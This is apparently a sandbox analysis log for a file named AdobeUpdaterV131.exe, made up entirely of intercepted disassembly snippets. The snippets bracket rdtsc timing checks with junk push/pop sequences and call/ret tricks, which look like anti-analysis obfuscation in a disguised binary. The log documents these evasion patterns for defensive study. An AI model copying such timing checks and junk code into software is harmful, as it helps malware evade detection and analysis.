Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 9124A0 second address: 91251E instructions: 0x00000000 rdtsc 0x00000002 js 00007F09D0731CA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b mov dword ptr [esp], eax 0x0000000e sub dword ptr [ebp+122D33B5h], eax 0x00000014 push dword ptr fs:[00000000h] 0x0000001b movsx edi, cx 0x0000001e mov dword ptr fs:[00000000h], esp 0x00000025 push 00000000h 0x00000027 push edi 0x00000028 call 00007F09D0731CA8h 0x0000002d pop edi 0x0000002e mov dword ptr [esp+04h], edi 0x00000032 add dword ptr [esp+04h], 00000019h 0x0000003a inc edi 0x0000003b push edi 0x0000003c ret 0x0000003d pop edi 0x0000003e ret 0x0000003f mov eax, dword ptr [ebp+122D0F45h] 0x00000045 mov ebx, dword ptr [ebp+122D35ACh] 0x0000004b push FFFFFFFFh 0x0000004d push 00000000h 0x0000004f push edx 0x00000050 call 00007F09D0731CA8h 0x00000055 pop edx 0x00000056 mov dword ptr [esp+04h], edx 0x0000005a add dword ptr [esp+04h], 0000001Ch 0x00000062 inc edx 0x00000063 push edx 0x00000064 ret 0x00000065 pop edx 0x00000066 ret 0x00000067 push eax 0x00000068 push edx 0x00000069 push eax 0x0000006a push edx 0x0000006b push eax 0x0000006c push edx 0x0000006d rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 90D62A second address: 90D62F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 90F526 second address: 90F534 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 911423 second address: 911435 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F09D0D9C3D6h 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 91251E second address: 912522 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 90D62F second address: 90D642 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F09D0D9C3DFh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 90F534 second address: 90F538 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 911435 second address: 91143A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 912522 second address: 912526 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 91143A second address: 911440 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 91726D second address: 9172E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push edi 0x00000006 pop edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebp 0x00000010 call 00007F09D0731CA8h 0x00000015 pop ebp 0x00000016 mov dword ptr [esp+04h], ebp 0x0000001a add dword ptr [esp+04h], 0000001Ch 0x00000022 inc ebp 0x00000023 push ebp 0x00000024 ret 0x00000025 pop ebp 0x00000026 ret 0x00000027 sub dword ptr [ebp+124474F8h], ecx 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push eax 0x00000032 call 00007F09D0731CA8h 0x00000037 pop eax 0x00000038 mov dword ptr [esp+04h], eax 0x0000003c add dword ptr [esp+04h], 00000016h 0x00000044 inc eax 0x00000045 push eax 0x00000046 ret 0x00000047 pop eax 0x00000048 ret 0x00000049 mov dword ptr [ebp+122D28A5h], edx 0x0000004f mov di, ax 0x00000052 push 00000000h 0x00000054 mov dword ptr [ebp+122D1C04h], eax 0x0000005a add ebx, 4CE83800h 0x00000060 xchg eax, esi 0x00000061 pushad 0x00000062 push ebx 0x00000063 pushad 0x00000064 popad 0x00000065 pop ebx 0x00000066 pushad 0x00000067 push eax 0x00000068 push edx 0x00000069 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 911440 second address: 911444 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 9172E4 second address: 9172F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 916523 second address: 916527 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 9172F2 second address: 9172F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 91151D second address: 911521 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 911521 second address: 911527 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 911527 second address: 91152C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 9193D2 second address: 9193EB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0731CB5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 9193EB second address: 9193F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F09D0D9C3D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 9193F5 second address: 9193F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 917442 second address: 91745B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0D9C3E5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 91A569 second address: 91A5DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop ebx 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push ebx 0x0000000c call 00007F09D0731CA8h 0x00000011 pop ebx 0x00000012 mov dword ptr [esp+04h], ebx 0x00000016 add dword ptr [esp+04h], 00000014h 0x0000001e inc ebx 0x0000001f push ebx 0x00000020 ret 0x00000021 pop ebx 0x00000022 ret 0x00000023 push 00000000h 0x00000025 push 00000000h 0x00000027 push ecx 0x00000028 call 00007F09D0731CA8h 0x0000002d pop ecx 0x0000002e mov dword ptr [esp+04h], ecx 0x00000032 add dword ptr [esp+04h], 00000015h 0x0000003a inc ecx 0x0000003b push ecx 0x0000003c ret 0x0000003d pop ecx 0x0000003e ret 0x0000003f mov ebx, dword ptr [ebp+122D1A01h] 0x00000045 push 00000000h 0x00000047 jmp 00007F09D0731CB9h 0x0000004c push eax 0x0000004d pushad 0x0000004e jmp 00007F09D0731CACh 0x00000053 pushad 0x00000054 push eax 0x00000055 push edx 0x00000056 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 921ED7 second address: 921EE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 jl 00007F09D0D9C3E4h 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 921EE8 second address: 921EEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 91A746 second address: 91A74C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 91A80A second address: 91A80E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 92640B second address: 926437 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F09D0D9C3E2h 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d jmp 00007F09D0D9C3E2h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 8C1BDE second address: 8C1BEB instructions: 0x00000000 rdtsc 0x00000002 jc 00007F09D0731CA8h 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 925B57 second address: 925B5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 925CBB second address: 925CBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 925E1C second address: 925E33 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F09D0D9C3DEh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 925FD5 second address: 925FF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnl 00007F09D0731CB2h 0x0000000b popad 0x0000000c pushad 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 925FF1 second address: 926010 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F09D0D9C3E4h 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 92FD7F second address: 92FD84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 92FF01 second address: 92FF21 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0D9C3E0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push eax 0x0000000c push edx 0x0000000d jbe 00007F09D0D9C3DCh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 92FF21 second address: 92FF25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 92FF25 second address: 92FF40 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F09D0D9C3D6h 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 jnp 00007F09D0D9C3DEh 0x00000018 push ecx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 92FFEF second address: 92FFF5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 92FFF5 second address: 92FFFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 92FFFB second address: 92FFFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 934225 second address: 934230 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007F09D0D9C3D6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 9344EB second address: 9344FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jg 00007F09D0731CA6h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 93463B second address: 93463F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 93463F second address: 934678 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F09D0731CA6h 0x00000008 jmp 00007F09D0731CB1h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ebx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 jmp 00007F09D0731CAFh 0x00000017 pop ebx 0x00000018 pushad 0x00000019 push ebx 0x0000001a pop ebx 0x0000001b jo 00007F09D0731CA6h 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 93945E second address: 939467 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 939467 second address: 93947E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F09D0731CAEh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 939CAD second address: 939CD4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d popad 0x0000000e pushad 0x0000000f jmp 00007F09D0D9C3E3h 0x00000014 push edi 0x00000015 push eax 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 939FC4 second address: 939FC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 940941 second address: 940945 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 940945 second address: 940958 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F09D0731CADh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 940958 second address: 940988 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F09D0D9C3DCh 0x00000008 jns 00007F09D0D9C3D6h 0x0000000e jmp 00007F09D0D9C3E6h 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push edx 0x00000016 pushad 0x00000017 jns 00007F09D0D9C3D6h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 90A593 second address: 90A59D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 90A59D second address: 90A5A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 90A5A1 second address: 90A60C instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F09D0731CA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push edx 0x00000011 call 00007F09D0731CA8h 0x00000016 pop edx 0x00000017 mov dword ptr [esp+04h], edx 0x0000001b add dword ptr [esp+04h], 0000001Dh 0x00000023 inc edx 0x00000024 push edx 0x00000025 ret 0x00000026 pop edx 0x00000027 ret 0x00000028 mov ecx, 77CABA14h 0x0000002d lea eax, dword ptr [ebp+1247E31Fh] 0x00000033 add edx, dword ptr [ebp+122D1B14h] 0x00000039 nop 0x0000003a jc 00007F09D0731CB0h 0x00000040 pushad 0x00000041 jnl 00007F09D0731CA6h 0x00000047 pushad 0x00000048 popad 0x00000049 popad 0x0000004a push eax 0x0000004b push eax 0x0000004c push edx 0x0000004d jmp 00007F09D0731CB3h 0x00000052 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 90A692 second address: 90A696 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 90A696 second address: 90A69C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 90A69C second address: 90A6BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F09D0D9C3E0h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jnl 00007F09D0D9C3D8h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 90AD2A second address: 90AD2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 90AD7A second address: 90ADD7 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F09D0D9C3DCh 0x00000008 jno 00007F09D0D9C3D6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp], esi 0x00000013 push edi 0x00000014 xor ch, 00000056h 0x00000017 pop edi 0x00000018 nop 0x00000019 pushad 0x0000001a pushad 0x0000001b jmp 00007F09D0D9C3E4h 0x00000020 pushad 0x00000021 popad 0x00000022 popad 0x00000023 jnl 00007F09D0D9C3D8h 0x00000029 popad 0x0000002a push eax 0x0000002b pushad 0x0000002c push edx 0x0000002d push ebx 0x0000002e pop ebx 0x0000002f pop edx 0x00000030 pushad 0x00000031 jmp 00007F09D0D9C3E9h 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 90B0CD second address: 90B0D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 94145E second address: 941468 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 947AC7 second address: 947AD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 947ED1 second address: 947ED5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 947ED5 second address: 947EE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F09D0731CA6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 947EE1 second address: 947EE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 947EE7 second address: 947EEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 947EEB second address: 947EEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 948168 second address: 94816E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 948634 second address: 948638 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 948638 second address: 948664 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0731CABh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F09D0731CB1h 0x00000012 ja 00007F09D0731CA8h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 948664 second address: 94866C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 9487D4 second address: 9487F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0731CB3h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f pop eax 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 948942 second address: 94894C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F09D0D9C3D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 94894C second address: 948966 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F09D0731CB4h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 948966 second address: 94896D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 948DEE second address: 948E07 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0731CAEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 94E4E9 second address: 94E4EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 94E687 second address: 94E68F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 94E68F second address: 94E6AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F09D0D9C3E8h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 94E6AD second address: 94E6B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 951521 second address: 951525 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 951525 second address: 951529 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
